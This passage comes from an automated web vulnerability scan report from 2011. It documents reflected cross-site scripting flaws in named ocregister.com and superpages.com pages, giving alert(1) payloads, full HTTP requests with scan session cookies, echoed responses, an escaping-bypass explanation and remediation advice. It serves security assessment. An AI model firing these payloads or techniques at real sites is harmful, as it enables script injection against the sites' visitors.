HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:28 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://letters.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:28 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-everb6706\"><script>alert(1)</script>6bccede39c1feed/" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b12b"><script>alert(1)</script>29a0ab24421 was submitted in the REST URL parameter 4. This input was echoed as 2b12b\"><script>alert(1)</script>29a0ab24421 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b"><script>alert(1)</script>29a0ab24421 HTTP/1.1 Host: letters.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:07:25 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://letters.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:07:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... l="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b\"><script>alert(1)</script>29a0ab24421feed/" /> ...[SNIP]...
The value of the &SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0186"%3balert(1)//4a2e6a0ce5b was submitted in the &SRC parameter. This input was echoed as e0186";alert(1)//4a2e6a0ce5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1ae0186"%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=0A0D8557B1084404AFE23DD0AF0AF253; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:22:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... window.locale = 'en-us'; var token = "RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2";
var spHeader=false; var cobrand="comlocal1ae0186";alert(1)//4a2e6a0ce5b"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC="banks"; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; va ...[SNIP]...
The value of the &spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b305f"-alert(1)-"5b1a94486f6 was submitted in the &spheader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6& HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=E5BF135AD9937E6B27515B002A95E5A6; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 19:07:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6&";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 415ee"%3balert(1)//7f39f412a8d was submitted in the C parameter. This input was echoed as 415ee";alert(1)//7f39f412a8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks415ee"%3balert(1)//7f39f412a8d&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=C1BB2C6D5F2026531BC42BC6B8F4DFAC; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:22:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... yFJXQWMj1bvQ2";
var spHeader=false; var cobrand="comlocal1a"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC="banks415ee";alert(1)//7f39f412a8d"; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; var spCampaignId2=""; var singleQuery2=""; var spType2=""; var spOnAMap2=null; var spC2=""; var spZoom=4; var spStyle="r"; var spD ...[SNIP]...
The value of the CS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5aa7"-alert(1)-"e8f7aa23d76 was submitted in the CS parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the L request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbefb"%3balert(1)//638e573e1c7 was submitted in the L parameter. This input was echoed as bbefb";alert(1)//638e573e1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101bbefb"%3balert(1)//638e573e1c7&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=0455C57151DFDC39EEC6EB920F1CE002; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... S2=false; var spLid2=""; var spBid2=""; var spCampaignId2=""; var singleQuery2=""; var spType2=""; var spOnAMap2=null; var spC2=""; var spZoom=4; var spStyle="r"; var spDD = false; var spAddress="19101bbefb";alert(1)//638e573e1c7"; var spStartAddress=""; var spTraffic = false; var spBeId = false; var spLat = null; var spLon = null; var spStartLocation = true;
var spc_lat = null; var spc_long = null; ...[SNIP]...
The value of the MCBP request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fed48"-alert(1)-"1cd3186e2fd was submitted in the MCBP parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=F434BBA89E81451FADCF2C4BAF96B9DD; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... eturning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the PS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242c7"-alert(1)-"6e00a234b00 was submitted in the PS parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=9139837C423FB41FB7994B9F30753C27; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:24:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... ed var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e454"%3balert(1)//a5898f77f83 was submitted in the SRC parameter. This input was echoed as 1e454";alert(1)//a5898f77f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&spheader=true&L=&SRC=bpo1e454"%3balert(1)//a5898f77f83 HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=117A4533D55B610A1C95579E212D0972; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 19:07:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... window.locale = 'en-us'; var token = "p3QTbbHsCs-eeUFhvWJsTUVffL_Ir8TWNCsd-WpPTj7F6jKZTdTbkF_H-pfUpTkqszv1R7ui7FAHG-ONafiS_w2";
var spHeader=true; var cobrand="bpo1e454";alert(1)//a5898f77f83"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC=""; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; var spC ...[SNIP]...
The value of the STYPE request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bc58"-alert(1)-"d4e5aaa0292 was submitted in the STYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=7AD460510827A183B38F52F6C40DBEE4; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:24:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
var fbClientId = "133515049997773";
</script> ...[SNIP]...
1.203. http://mapserver.superpages.com/mapbasedsearch/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mapserver.superpages.com
Path:
/mapbasedsearch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 486fb"-alert(1)-"cf09a8c6088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1 HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=F0CC14DC558B2EE853A42B486D028978; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:23:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... var spc_long = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9334"-alert(1)-"340f60da8f8 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8 HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=48CA725AE0BF7A03BE6E941C2CF30885; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 16:24:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... ferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9124c"-alert(1)-"2c2736523e0 was submitted in the spheader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L= HTTP/1.1 Host: mapserver.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK Server: Unspecified Set-Cookie: JSESSIONID=762E206D0334242828CD0BC99ACC410B; Path=/mapbasedsearch Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/ Content-Type: text/html Date: Thu, 03 Feb 2011 19:07:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L=";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the FP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bf14\'%3balert(1)//32bd7f650df was submitted in the FP parameter. This input was echoed as 5bf14\\';alert(1)//32bd7f650df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of the a request parameter is copied into the HTML document as plain text between tags. The payload f2f57<script>alert(1)</script>151fa128c48 was submitted in the a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Unspecified Content-Length: 637 Date: Thu, 03 Feb 2011 18:57:38 GMT
SP_SearchManager._ApplyResults(1,0,[],[],false,"<div class=message>No 'banksf2f57<script>alert(1)</script>151fa128c48' found on this map.<br><br><div class=solution>Try these solutions<br><br><span cl ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81705"><script>alert(1)</script>5be155ad2e1 was submitted in the cat parameter. This input was echoed as 81705\"><script>alert(1)</script>5be155ad2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?cat=81705"><script>alert(1)</script>5be155ad2e1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:08:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62649
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/?cat=81705\"><script>alert(1)</script>5be155ad2e1feed/" /> ...[SNIP]...
1.209. http://mortgage.ocregister.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9060"><script>alert(1)</script>27ab659d801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9060\"><script>alert(1)</script>27ab659d801 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d9060"><script>alert(1)</script>27ab659d801=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
